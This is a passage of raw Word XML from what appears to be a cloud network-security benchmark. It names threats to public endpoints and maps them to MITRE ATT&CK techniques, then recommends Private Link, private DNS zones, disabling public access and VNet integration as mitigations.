        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Risk of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590DD426" w14:textId="2A485F36" w:rsidR="00F64BA8" w:rsidRDefault="00F64BA8" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Data exfiltration through public endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734BD7E6" w14:textId="0912AA16" w:rsidR="007E1022" w:rsidRPr="00E53977" w:rsidRDefault="007E1022" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1022">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Attackers exploit publicly accessible storage accounts, databases, or APIs to exfiltrate sensitive data by establishing unauthorized connections to exposed endpoints, bypassing network segmentation controls and enabling large-scale data theft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BDCEF0" w14:textId="08303334" w:rsidR="00F64BA8" w:rsidRDefault="00F64BA8" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Application-layer attacks against public endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C39B6AE" w14:textId="1C2A6A8F" w:rsidR="007E1022" w:rsidRDefault="007E1022" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1022">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Distributed Denial of Service (DDoS) attacks, SQL </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E1022">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E1022">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>, and other application exploits target publicly exposed web services, APIs, and databases, overwhelming resources or exploiting vulnerabilities to cause service disruption or data compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633A3D31" w14:textId="6C84814D" w:rsidR="00F64BA8" w:rsidRDefault="00F64BA8" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Man-in-the-middle attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22810E94" w14:textId="2C229848" w:rsidR="007E1022" w:rsidRPr="00E53977" w:rsidRDefault="007E1022" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1022">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Attackers intercept traffic flowing over public networks to publicly exposed services, capturing credentials, session tokens, or sensitive data transmitted without adequate encryption or private connectivity, enabling account takeover or data theft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497E2723" w14:textId="66248C5F" w:rsidR="00F64BA8" w:rsidRPr="00E53977" w:rsidRDefault="00A118F0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D935DBA" w14:textId="36DB1175" w:rsidR="00A118F0" w:rsidRDefault="00A118F0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092605AE" w14:textId="2129B07F" w:rsidR="00C93534" w:rsidRPr="00E53977" w:rsidRDefault="00C93534" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93534">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1190 - Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E860B0D" w14:textId="3A411C9F" w:rsidR="00A118F0" w:rsidRDefault="00A118F0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298034A1" w14:textId="10676374" w:rsidR="00C93534" w:rsidRPr="00E53977" w:rsidRDefault="00C93534" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93534">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1041 - Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999CD21" w14:textId="53C97A28" w:rsidR="00A118F0" w:rsidRDefault="00A118F0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642727A3" w14:textId="460A57F7" w:rsidR="00C93534" w:rsidRPr="00E53977" w:rsidRDefault="00C93534" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="341"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93534">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1021 - Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F3B662" w14:textId="53369184" w:rsidR="00D36761" w:rsidRDefault="00C06689" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>NS-2.1: Use Private Link for service connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5F5438" w14:textId="521E1E5A" w:rsidR="002E33E0" w:rsidRPr="002E33E0" w:rsidRDefault="002E33E0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t xml:space="preserve">Private connectivity eliminates public internet exposure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t xml:space="preserve"> cloud services by establishing direct network paths within your virtual infrastructure. Private Link creates private endpoints with dedicated IP addresses inside your virtual networks, ensuring traffic to cloud services never traverses the public internet while maintaining DNS-based access patterns. This approach significantly reduces attack surface and prevents data exfiltration through publicly accessible endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232ED5AB" w14:textId="5024AB39" w:rsidR="002E33E0" w:rsidRDefault="002E33E0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>Implement private connectivity for cloud services through these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48786B6A" w14:textId="0A3E5734" w:rsidR="002E33E0" w:rsidRDefault="002E33E0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>Deploy private endpoints for supported services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FE76C" w14:textId="26E4E4AE" w:rsidR="002E33E0" w:rsidRPr="002E33E0" w:rsidRDefault="002E33E0" w:rsidP="00BC6158">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1170"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="002E33E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          </w:rPr>
          <w:t>private endpoints</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t xml:space="preserve"> within your virtual network for Azure resources </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="002E33E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          </w:rPr>
          <w:t>supporting Private Link</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Azure Storage, Azure SQL Database, Azure Key Vault), establishing private IP addresses (e.g., 10.0.2.4) accessible only from your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BBDA81" w14:textId="4191A5A0" w:rsidR="000009DC" w:rsidRDefault="000009DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure private DNS zones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EDBCE5" w14:textId="205B1D08" w:rsidR="002E33E0" w:rsidRPr="002E33E0" w:rsidRDefault="002E33E0" w:rsidP="00BC6158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1170"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Create Azure Private DNS zones to override public DNS resolution, ensuring fully qualified domain names (FQDNs) like mystorageaccount1.blob.core.windows.net </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>resolve to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> private IP addresses within your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than public endpoints, maintaining seamless connectivity for applications using FQDN-based access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53498EEF" w14:textId="04C1BCEC" w:rsidR="000009DC" w:rsidRDefault="006819DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Disable public access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E20A6" w14:textId="25C7DB56" w:rsidR="002E33E0" w:rsidRPr="002E33E0" w:rsidRDefault="002E33E0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure service-level settings to disable public network access entirely once private endpoints are deployed, ensuring all traffic flows exclusively through private connectivity without fallback to public endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0D324" w14:textId="7D8A3AB2" w:rsidR="00F30848" w:rsidRDefault="00F30848" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NS-2.2: Deploy service into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="774A1019" w14:textId="7C6260DA" w:rsidR="00465B6F" w:rsidRPr="00465B6F" w:rsidRDefault="00465B6F" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual network integration enables cloud services to operate within private network boundaries, establishing direct connectivity to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>-hosted resources without public internet exposure. By deploying services into virtual networks, organizations gain granular control over network traffic through security groups and route tables while maintaining service isolation from external threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5894FA" w14:textId="056270AE" w:rsidR="00465B6F" w:rsidRPr="00465B6F" w:rsidRDefault="00465B6F" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>Deploy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t xml:space="preserve"> services with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t xml:space="preserve"> supported:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC4A72" w14:textId="70ADCAB4" w:rsidR="00E547DC" w:rsidRDefault="00E547DC" w:rsidP="00BC6158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Deploy services into virtual networks</w:t>
      </w:r>
      <w:r w:rsidR="009474BB" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFFD698" w14:textId="22225A96" w:rsidR="00465B6F" w:rsidRPr="00E53977" w:rsidRDefault="00465B6F" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1170"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">For services supporting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration (e.g., Azure App Service, Azure Functions, Azure Container Instances), configure deployment into new or existing virtual networks, specifying appropriate subnets aligned with your segmentation strategy and enabling private communication with other </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189B6671" w14:textId="1A92D9E8" w:rsidR="008C74EB" w:rsidRDefault="008C74EB" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure network security controls</w:t>
      </w:r>
      <w:r w:rsidR="00370940" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D71798F" w14:textId="4C187745" w:rsidR="00465B6F" w:rsidRPr="00E53977" w:rsidRDefault="00465B6F" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1170"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B6F">
        <w:rPr>
